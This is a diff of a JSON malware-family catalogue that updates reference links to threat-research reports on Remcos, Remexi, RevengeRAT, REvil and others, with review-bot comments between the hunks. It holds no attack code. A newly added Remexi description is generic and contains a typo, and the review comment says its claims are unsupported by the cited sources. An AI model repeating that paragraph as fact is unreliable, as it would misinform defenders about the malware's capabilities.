- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://blog.morphisec.com/nft-malware-new-evasion-abilities",
- "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://muha2xmad.github.io/unpacking/remcos/",
- "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.esentire.com/blog/remcos-rat",
- "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
- "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
- "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
- "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
- "https://secrary.com/ReversingMalware/RemcosRAT/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
- "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
- "https://muha2xmad.github.io/mal-document/remcosdoc/",
- "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "http://malware-traffic-analysis.net/2017/12/22/index.html",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
- "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://asec.ahnlab.com/en/32376/",
- "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
- "https://www.telsy.com/download/4832/",
- "https://www.connectwise.com/resources/formbook-remcos-rat",
- "https://intel471.com/blog/privateloader-malware",
- "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://asec.ahnlab.com/ko/25837/",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://dissectingmalwa.re/malicious-ratatouille.html",
- "https://asec.ahnlab.com/ko/32101/",
- "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
- "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
- "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
- "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
- "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://perception-point.io/behind-the-attack-remcos-rat/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
- "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
- "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
- "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
- "https://www.youtube.com/watch?v=DIH4SvKuktM",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
+ "https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/",
 "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
 "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/",
+ "https://www.telsy.com/download/4832/",
+ "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD",
+ "https://www.jaiminton.com/reverse-engineering/remcos#",
+ "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/",
+ "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
+ "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.youtube.com/watch?v=DIH4SvKuktM",
+ "https://perception-point.io/behind-the-attack-remcos-rat/",
+ "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
+ "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
+ "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://muha2xmad.github.io/mal-document/remcosdoc/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing",
+ "https://blog.morphisec.com/nft-malware-new-evasion-abilities",
+ "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md",
+ "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://dissectingmalwa.re/malicious-ratatouille.html",
+ "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://www.connectwise.com/resources/formbook-remcos-rat",
+ "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html",
+ "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
+ "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://www.esentire.com/blog/remcos-rat",
 "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87",
- "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/"
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://muha2xmad.github.io/unpacking/remcos/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://asec.ahnlab.com/en/32376/",
+ "https://asec.ahnlab.com/ko/32101/",
+ "https://secrary.com/ReversingMalware/RemcosRAT/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly",
+ "https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877"
 ],
 "synonyms": [
 "RemcosRAT",
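Review bot: The newly added Remcos ref `https://www.jaiminton.com/reverse-engineering/remcos#` ends in an empty fragment, which looks like an artefact of how the URL was copied rather than part of the address. Storing it as `"https://www.jaiminton.com/reverse-engineering/remcos"` gives the canonical form and avoids a near-duplicate entry if the fragment-free URL is imported on a later sync. The rest of the hunk is a reorder of the existing refs plus four genuinely new URLs.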
@@ -41108,18 +43060,18 @@
 "value": "Remcos"
 },
 {
- "description": "",
+ "description": "Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware utilizes various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages coAmmand-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
 "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
 "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "https://securelist.com/chafer-used-remexi-malware/89538/",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "https://twitter.com/QW5kcmV3/status/1095833216605401088",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
 "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://securelist.com/chafer-used-remexi-malware/89538/",
+ "https://twitter.com/QW5kcmV3/status/1095833216605401088"
 ],
 "synonyms": [
 "CACHEMONEY"
@@ -41162,11 +43114,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
- "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html",
 "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html",
 "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html",
- "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html"
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -41179,8 +43131,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
 ],
 "synonyms": [
 "WINDSHIELD"
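Review bot: The new Remexi description contains the typo `coAmmand-and-control`, which should read `command-and-control`. Unlike the RegretLocker description in this commit it names no source, and its claims (exploit kits, compromised websites, rootkit persistence, theft of financial data) do not obviously follow from any of the listed refs, which are Chafer reports and IOC documents; if the paragraph was generated rather than taken from a reference, it would be better attributed to its source or replaced by a short summary drawn from those refs. The Remsec and Remy hunks on this line are reorders only.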
@@ -41222,13 +43174,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
- "https://github.com/cocaman/retefe",
- "https://github.com/Tomasuh/retefe-unpacker",
- "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
 "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
 "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
- "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
+ "https://github.com/cocaman/retefe",
 "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
+ "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
+ "https://github.com/Tomasuh/retefe-unpacker",
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
 "https://www.govcert.admin.ch/blog/35/reversing-retefe"
 ],
 "synonyms": [
@@ -41245,10 +43197,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro",
- "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/",
 "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
- "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/"
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/",
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
 ],
 "synonyms": [],
 "type": []
@@ -41274,27 +43226,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://isc.sans.edu/diary/rss/22590",
- "https://blogs.360.cn/post/APT-C-44.html",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://blog.reversinglabs.com/blog/dotnet-loaders",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
 "https://securelist.com/revengehotels/95229/",
+ "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://isc.sans.edu/diary/rss/22590",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
+ "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
 "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
 "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/"
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://blog.reversinglabs.com/blog/dotnet-loaders"
 ],
 "synonyms": [
 "Revetrat"
@@ -41309,12 +43261,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat",
- "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
- "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
- "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
 "https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/"
 ],
 "synonyms": [],
 "type": []
@@ -41340,286 +43292,286 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/",
- "https://twitter.com/VK_Intel/status/1374571480370061312?s=20",
- "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
- "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801",
- "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
- "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/",
- "https://www.grahamcluley.com/travelex-paid-ransom/",
- "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/",
- "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
- "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
- "https://asec.ahnlab.com/ko/19640/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/",
- "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/",
- "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
- "https://www.kaseya.com/potential-attack-on-kaseya-vsa/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/",
- "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/",
- "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
- "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422",
- "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain",
- "https://www.netskope.com/blog/netskope-threat-coverage-revil",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/",
- "http://www.secureworks.com/research/threat-profiles/gold-southfield",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
- "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
- "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://www.bbc.com/news/technology-59297187",
